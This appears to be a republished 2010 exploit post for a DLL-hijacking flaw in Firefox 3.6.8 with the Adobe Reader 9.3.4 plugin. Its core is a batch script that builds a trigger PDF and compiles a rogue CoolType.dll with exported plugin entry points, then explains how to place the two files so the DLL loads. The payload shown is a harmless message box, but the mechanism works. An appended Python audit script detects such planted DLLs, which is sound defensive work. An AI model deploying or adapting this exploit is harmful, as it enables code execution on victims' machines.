
Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolType.dll)

Posted on 27 August 2010

==================================================================
Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolType.dll)
==================================================================

@echo off
GOTO START
 * [*]
 * [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)
 * [*]
 * [*] Author: Rh0 (Rh0[at].z1p.biz)
 * [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218
 * [*] Tested on: Windows XP Pro SP3 x86 En
 * [*] Description:
 *
 * Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd
 *
 * When Firefox plugins are used, the necessary DLLs for the plugin to run
 * are searched in folders in the following order:
 *
 *   mozilla firefox dir
 *   windows system32 dir
 *   windows system dir
 *   windows dir
 *   current dir   <-- hijack possibility
 *   plugin program dir
 *
 * Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked.
 * just 2 examples for the Adobe Reader plugin:
 *   CoolType.dll
 *   authplay.dll (if the pdf contains an embedded swf file)
 *
 * This Batch File example creates a minimal pdf file, CoolType.c and
 * compiles it to CoolType.dll (gcc has to be installed).
 * When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory.
 * So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs.
 * For this exploit to work, Firefox and the Adobe Reader 9.3.4 plugin have to be installed.
 * To test the other extensions simply change the extension of the pdf file, and open it with firefox

:START
echo.
echo [*]
echo [*] Creating pdf file...

REM PDF FILENAME
set pdf=OpenwithFirefox.pdf

echo %%PDF-1.4>"%pdf%"
echo %%Çìó¢>>"%pdf%"
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"
echo xref>>"%pdf%"
echo 0 6 >>"%pdf%"
echo 0000000000 65535 f>>"%pdf%"
echo 0000000015 00000 n>>"%pdf%"
echo 0000000164 00000 n>>"%pdf%"
echo 0000000240 00000 n>>"%pdf%"
echo 0000000309 00000 n>>"%pdf%"
echo 0000000365 00000 n>>"%pdf%"
echo trailer>>"%pdf%"
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"
echo startxref>>"%pdf%"
echo 477>>"%pdf%"
echo %%%%EOF>>"%pdf%"

echo [*] %pdf% created.
echo [*]
echo [*] Creating CoolType.c source...

REM DLL SOURCE FILENAME
set dllsrc=CoolType.c

echo #include ^<windows.h^>>"%dllsrc%"
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"
echo int runme()>>"%dllsrc%"
echo {>>"%dllsrc%"
echo MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"
echo return 0;>>"%dllsrc%"
echo }>>"%dllsrc%"
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"

echo [*] Done.
echo [*] Compiling CoolType.dll...
gcc -shared -o CoolType.dll CoolType.c
echo [*] Done
echo [*]
echo [*] Copy "%pdf%" and CoolType.dll to the same
echo [*] directory, open directory in windows explorer
echo [*] and open "%pdf%" in Firefox.
echo [*]
pause

# Inj3ct0r.com [2010-08-27]
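
A defender-side triage check for the condition described above, added here as an example (not code from the original post): it models only the search order the advisory lists and flags DLLs that sit beside a document with an affected extension and would be found before the plugin's own copy. The directory roles, helper names and the sample tree of empty files are assumptions constructed for the demonstration.

```python
import os
import tempfile

# Directory roles in the order the advisory lists them (roles, not real paths).
SEARCH_ORDER = ["firefox", "system32", "system", "windows", "current", "plugin"]
DOC_EXTS = {".pdf", ".pdfxml", ".mars", ".fdf", ".xfdf", ".xdp", ".xfd"}

def find(dll, folder):
    """Case-insensitive lookup of dll in folder, as on Windows file systems."""
    names = os.listdir(folder) if folder and os.path.isdir(folder) else []
    return next((os.path.join(folder, n) for n in names if n.lower() == dll.lower()), None)

def resolve(dll, dirs):
    """Return (role, path) of the first directory in SEARCH_ORDER holding dll."""
    for role in SEARCH_ORDER:
        path = find(dll, dirs.get(role))
        if path:
            return role, path
    return None, None

def audit(folder, dirs):
    """DLLs beside a document in folder that would load before the plugin's copy."""
    names = os.listdir(folder)
    if not any(os.path.splitext(n)[1].lower() in DOC_EXTS for n in names):
        return []
    hits = []
    for name in sorted(n for n in names if n.lower().endswith(".dll")):
        role, _ = resolve(name, dict(dirs, current=folder))
        if role == "current" and find(name, dirs.get("plugin")):
            hits.append(name)
    return hits

def build_sample():
    """Constructed tree of empty files; names and layout are sample data only."""
    layout = {"firefox": ["xul.dll"], "system32": ["version.dll"],
              "plugin": ["CoolType.dll", "authplay.dll", "version.dll"],
              "share": ["OpenwithFirefox.pdf", "cooltype.dll", "version.dll"],
              "clean": ["report.pdf"], "nodoc": ["CoolType.dll"]}
    dirs, root = {}, tempfile.mkdtemp()
    for role, files in layout.items():
        dirs[role] = os.path.join(root, role)
        os.makedirs(dirs[role])
        for f in files:
            open(os.path.join(dirs[role], f), "w").close()
    return dirs

if __name__ == "__main__":
    sample = build_sample()
    print({k: audit(sample[k], sample) for k in ("share", "clean", "nodoc")})
```

In the sample, `version.dll` in the shared folder is not flagged because a copy earlier in the listed order (system32) would be found first; only the name that exists nowhere before the current directory is reported.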

 
